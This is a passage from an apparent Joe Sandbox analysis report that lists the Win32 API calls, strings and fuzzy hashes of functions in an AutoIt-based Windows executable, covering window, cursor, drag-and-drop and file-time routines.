                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00772949
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0077297C
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00772990
                                                • GetClientRect.USER32(00000000,000000FF), ref: 007729AE
                                                • GetStockObject.GDI32(00000011), ref: 007729CA
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 007729D5
                                                  • Part of subcall function 00772344: GetCursorPos.USER32(?), ref: 00772357
                                                  • Part of subcall function 00772344: ScreenToClient.USER32(008357B0,?), ref: 00772374
                                                  • Part of subcall function 00772344: GetAsyncKeyState.USER32(00000001), ref: 00772399
                                                  • Part of subcall function 00772344: GetAsyncKeyState.USER32(00000002), ref: 007723A7
                                                • SetTimer.USER32(00000000,00000000,00000028,00771256), ref: 007729FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: f7b8e9d059de86f14c3131fd59bab3ae8718cea5c698673b45e74103eba5a453
                                                • Instruction ID: dfbb6e1572e000ffc6fea111dfb3bb09c31d2f2ca9761504f374f17d19623640
                                                • Opcode Fuzzy Hash: f7b8e9d059de86f14c3131fd59bab3ae8718cea5c698673b45e74103eba5a453
                                                • Instruction Fuzzy Hash: 32B16E71600209EFDF14DFA8DC45BAE7BB4FB48354F108229FA19E7290DB78A851CB54
                                                Function 007CA844 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CA885
                                                • __swprintf.LIBCMT ref: 007CA926
                                                • _wcscmp.LIBCMT ref: 007CA939
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007CA98E
                                                • _wcscmp.LIBCMT ref: 007CA9CA
                                                • GetClassNameW.USER32(?,?,00000400), ref: 007CAA01
                                                • GetDlgCtrlID.USER32(?), ref: 007CAA53
                                                • GetWindowRect.USER32(?,?), ref: 007CAA89
                                                • GetParent.USER32(?), ref: 007CAAA7
                                                • ScreenToClient.USER32(00000000), ref: 007CAAAE
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CAB28
                                                • _wcscmp.LIBCMT ref: 007CAB3C
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 007CAB62
                                                • _wcscmp.LIBCMT ref: 007CAB76
                                                  • Part of subcall function 007937AC: _iswctype.LIBCMT ref: 007937B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                • String ID: %s%u
                                                • API String ID: 3744389584-679674701
                                                • Opcode ID: 4da34ffd5cbdbe9d231e107bfb44d2639f2f4421f662af473e5a4aa155885359
                                                • Instruction ID: e9ead79d78460581a8a0cc831ccb67201435cbc5a6a4adf03810d1bc2b976983
                                                • Opcode Fuzzy Hash: 4da34ffd5cbdbe9d231e107bfb44d2639f2f4421f662af473e5a4aa155885359
                                                • Instruction Fuzzy Hash: FFA1BF7120470AFBDB15DE64C888FAAB7E9FF04319F10862DE999C2150DB38ED45CB92
                                                Function 007CB196 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 007CB1DA
                                                • _wcscmp.LIBCMT ref: 007CB1EB
                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 007CB213
                                                • CharUpperBuffW.USER32(?,00000000), ref: 007CB230
                                                • _wcscmp.LIBCMT ref: 007CB24E
                                                • _wcsstr.LIBCMT ref: 007CB25F
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 007CB297
                                                • _wcscmp.LIBCMT ref: 007CB2A7
                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 007CB2CE
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 007CB317
                                                • _wcscmp.LIBCMT ref: 007CB327
                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 007CB34F
                                                • GetWindowRect.USER32(00000004,?), ref: 007CB3B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                • String ID: @$ThumbnailClass
                                                • API String ID: 1788623398-1539354611
                                                • Opcode ID: c8b2765a98378044dd01b6867971d4e23285e10aea3abe687e7dadd4dc8b8426
                                                • Instruction ID: fcfe26a1f7d9f99950ad4dd1ccb7e73e3399e580acac15c5c5ab42b91aa75b7d
                                                • Opcode Fuzzy Hash: c8b2765a98378044dd01b6867971d4e23285e10aea3abe687e7dadd4dc8b8426
                                                • Instruction Fuzzy Hash: 3C8181710083459BDB05DF14C886FAABBE8FF44354F14856EFD899A0A2DB38DD4ACB61
                                                Function 007CAFDF Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                • Opcode ID: 1b13c79597693c791c9446bfa62050d8b0194c3c4f72bd218cb6fa1783c22f0f
                                                • Instruction ID: cd143b5d77a16e61118f086a08722c0cf8765569dc1d83119b4a7a8d3f818d26
                                                • Opcode Fuzzy Hash: 1b13c79597693c791c9446bfa62050d8b0194c3c4f72bd218cb6fa1783c22f0f
                                                • Instruction Fuzzy Hash: 1831AF30A48229E6DE24EA61EC4BFAF77A4EF10760F20412CB466B11D2EF5D6F84C651
                                                Function 007CC2C0 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 007CC2D3
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007CC2E5
                                                • SetWindowTextW.USER32(?,?), ref: 007CC2FC
                                                • GetDlgItem.USER32(?,000003EA), ref: 007CC311
                                                • SetWindowTextW.USER32(00000000,?), ref: 007CC317
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CC327
                                                • SetWindowTextW.USER32(00000000,?), ref: 007CC32D
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007CC34E
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007CC368
                                                • GetWindowRect.USER32(?,?), ref: 007CC371
                                                • SetWindowTextW.USER32(?,?), ref: 007CC3DC
                                                • GetDesktopWindow.USER32 ref: 007CC3E2
                                                • GetWindowRect.USER32(00000000), ref: 007CC3E9
                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007CC435
                                                • GetClientRect.USER32(?,?), ref: 007CC442
                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007CC467
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007CC492
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: a5760d6eeac4a735bd2f86985556a0704e5c493afd4ce320d4771b885b5f3974
                                                • Instruction ID: 4ff4119d6186bde5b83f5eeed636844a08e9c14c375d8bd2d1505dc5dcfb8ede
                                                • Opcode Fuzzy Hash: a5760d6eeac4a735bd2f86985556a0704e5c493afd4ce320d4771b885b5f3974
                                                • Instruction Fuzzy Hash: B9514C31900709EFDB21DFA8DD89F6EBBB5FF04705F00852CE686A25A0CB78A954DB54
                                                Function 007E5113 Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 007E5129
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 007E5134
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 007E513F
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 007E514A
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 007E5155
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 007E5160
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 007E516B
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 007E5176
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 007E5181
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 007E518C
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 007E5197
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 007E51A2
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 007E51AD
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 007E51B8
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 007E51C3
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 007E51CE
                                                • GetCursorInfo.USER32(?), ref: 007E51DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$Info
                                                • String ID:
                                                • API String ID: 2577412497-0
                                                • Opcode ID: ad95e1f9db49bef9114c5ae5834145256db8b976e2c58631e53b64b65b606388
                                                • Instruction ID: f18b3ef0e80c13473ad5732785c4b5402f4316c6f054d797f9c7ef9e82eeb544
                                                • Opcode Fuzzy Hash: ad95e1f9db49bef9114c5ae5834145256db8b976e2c58631e53b64b65b606388
                                                • Instruction Fuzzy Hash: CF31E5B0D4931E6ADB109FB68C8996EBEECFF08754F50452AE50DE7280DA7865008FA1
                                                Function 007FA1EB Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007FA28B
                                                • DestroyWindow.USER32(00000000,?), ref: 007FA305
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007FA37F
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007FA3A1
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA3B4
                                                • DestroyWindow.USER32(00000000), ref: 007FA3D6
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00770000,00000000), ref: 007FA40D
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA426
                                                • GetDesktopWindow.USER32 ref: 007FA43F
                                                • GetWindowRect.USER32(00000000), ref: 007FA446
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007FA45E
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007FA476
                                                  • Part of subcall function 007725DB: GetWindowLongW.USER32(?,000000EB), ref: 007725EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 1297703922-3619404913
                                                • Opcode ID: cba101a0b71966c1280e7a84c7753a88234e949db95c012dbefb37172232bb4b
                                                • Instruction ID: e1485de4ac50ae810c594caaed401ecb5326319b5d7a87265c20027d7f7b71f9
                                                • Opcode Fuzzy Hash: cba101a0b71966c1280e7a84c7753a88234e949db95c012dbefb37172232bb4b
                                                • Instruction Fuzzy Hash: 31716BB1150248AFDB20CF28DC49F7677E5FB88700F04462DFA89873A1DB78A905CB66
                                                Function 007FC668 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • DragQueryPoint.SHELL32(?,?), ref: 007FC691
                                                  • Part of subcall function 007FAB69: ClientToScreen.USER32(?,?), ref: 007FAB92
                                                  • Part of subcall function 007FAB69: GetWindowRect.USER32(?,?), ref: 007FAC08
                                                  • Part of subcall function 007FAB69: PtInRect.USER32(?,?,007FC07E), ref: 007FAC18
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007FC6FA
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007FC705
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007FC728
                                                • _wcscat.LIBCMT ref: 007FC758
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007FC76F
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007FC788
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007FC79F
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007FC7C1
                                                • DragFinish.SHELL32(?), ref: 007FC7C8
                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007FC8BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                • API String ID: 169749273-3440237614
                                                • Opcode ID: d747941cad5671ff4586fdb9ef2348126ab2acdea2840a8b3886b001ed830caa
                                                • Instruction ID: 70ec5fd2cc06195fdd1e0f59b61c6e7bddfb565721cf83f5200bdc3d09d2c21d
                                                • Opcode Fuzzy Hash: d747941cad5671ff4586fdb9ef2348126ab2acdea2840a8b3886b001ed830caa
                                                • Instruction Fuzzy Hash: E9617C71508304EFCB01EF64DC89DABBBE9FF88750F00492DF695922A1DB749A49CB52
                                                Function 007F43FB Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007F448D
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F44D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 3974292440-4258414348
                                                • Opcode ID: ead7cf53f9159c0c886f80df6ab494f856b36d63749de7cf49893562a83e8c97
                                                • Instruction ID: c2377f9875e5d04047cb9a6e232ee06be046c37fc2f9dfebc22f95c1557e14f6
                                                • Opcode Fuzzy Hash: ead7cf53f9159c0c886f80df6ab494f856b36d63749de7cf49893562a83e8c97
                                                • Instruction Fuzzy Hash: 51917E34204715DFCF14EF10C495A7AB7A1AF85360F04846CFA9A9B3A2CB38ED49CB91
                                                Function 007FB832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007FB8E8
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,007F6B43,?), ref: 007FB944
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FB97D
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007FB9C0
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FB9F7
                                                • FreeLibrary.KERNEL32(?), ref: 007FBA03
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007FBA13
                                                • DestroyIcon.USER32(?), ref: 007FBA22
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007FBA3F
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007FBA4B
                                                  • Part of subcall function 0079307D: __wcsicmp_l.LIBCMT ref: 00793106
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                • String ID: .dll$.exe$.icl
                                                • API String ID: 1212759294-1154884017
                                                • Opcode ID: cd6297cd96a381087889129fbb226b4eed7021b53182f4d599717d541f13e954
                                                • Instruction ID: 6047a6c258a70b18bf69983203d8ea0a45a204add260a2f1fa0d2195d6309d42
                                                • Opcode Fuzzy Hash: cd6297cd96a381087889129fbb226b4eed7021b53182f4d599717d541f13e954
                                                • Instruction Fuzzy Hash: 0761BF71600619FAEB14EF64DC45BBE77ACFF08720F108119FA15D62D1DB78A980DBA0
                                                Function 007DDCA6 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 007DDD68
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007DDD78
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007DDD84
                                                • __wsplitpath.LIBCMT ref: 007DDDE2
                                                • _wcscat.LIBCMT ref: 007DDDFA
                                                • _wcscat.LIBCMT ref: 007DDE0C
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DDE21
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDE35
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDE67
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDE88
                                                • _wcscpy.LIBCMT ref: 007DDE94
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007DDED3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                • String ID: *.*
                                                • API String ID: 3566783562-438819550
                                                • Opcode ID: f92538308417208b8b66e3f37b2221ec41b564b1fa5e249627bfb8a108421722
                                                • Instruction ID: 5942880bc9012d139518efa66ff8b9464e71585ea8e251b3c4720a9378aae6ff
                                                • Opcode Fuzzy Hash: f92538308417208b8b66e3f37b2221ec41b564b1fa5e249627bfb8a108421722
                                                • Instruction Fuzzy Hash: 3C614B765042059FCB20EF64C8449AEB7F9FF89310F04891EF989D7251EB39E945CB92
                                                Function 007D9CC2 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007D9D09
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007D9D2A
                                                • __swprintf.LIBCMT ref: 007D9D83
                                                • __swprintf.LIBCMT ref: 007D9D9C
                                                • _wprintf.LIBCMT ref: 007D9E43
                                                • _wprintf.LIBCMT ref: 007D9E61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 311963372-3080491070
                                                • Opcode ID: 9e7291b5d87f0d0dbbdceea7d94c7be66357391a060d9dace27003294260969c
                                                • Instruction ID: e7056efcb0d303c3c3871e13cf8b599160f02dbd07accd27d825b189356a1205
                                                • Opcode Fuzzy Hash: 9e7291b5d87f0d0dbbdceea7d94c7be66357391a060d9dace27003294260969c
                                                • Instruction Fuzzy Hash: 76518F31900609EACF19EBE0DD8AEEEB779EF14340F208565F50962191DB782F59CBA0
                                                Function 007DA3DC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • CharLowerBuffW.USER32(?,?), ref: 007DA455
                                                • GetDriveTypeW.KERNEL32 ref: 007DA4A2
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DA4EA
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DA521
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DA54F
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                Strings
                                                Memory Dump Source
